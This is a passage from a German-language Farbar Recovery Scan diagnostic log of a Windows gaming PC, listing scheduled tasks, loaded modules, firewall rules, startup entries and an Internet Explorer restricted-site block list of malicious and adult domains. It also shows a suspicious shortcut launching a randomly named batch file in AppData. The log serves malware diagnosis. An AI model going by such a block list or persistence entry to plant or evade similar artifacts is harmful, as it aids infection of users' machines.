Inc.) Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {A803118B-8018-4040-B0AB-DEBB70589A5F} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation) Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat () ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll 2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll 2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll 2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll 2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll 2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll 2014-09-19 17:15 - 2014-09-19 17:15 - 000330240 _____ () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe 2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe 2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll 2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll 2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll 2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll 2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll 2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll 2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll 2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll 2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll 2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll 2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll 2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll 2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll 2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll 2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll 2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll 2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll 2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll 2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll 2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll 2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll 2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll 2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll 2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll 2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll 2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll 2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll 2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll 2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL 2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll 2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll 2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll 2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll 2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll 2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll 2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll 2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll 2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll 2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll 2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll 2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl 2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl 2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl 2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll 2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll 2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll 2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll 2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll 2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll 2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135] ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com Da befinden sich 4789 mehr Seiten. ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg DNS Servers: 62.2.24.162 - 62.2.17.61 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == MSCONFIG\Services: PDF Architect 5 Manager => 2 HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk" HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk" HKLM\...\StartupApproved\Run32: => "UpdReg" HKLM\...\StartupApproved\Run32: => "Raptr" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files 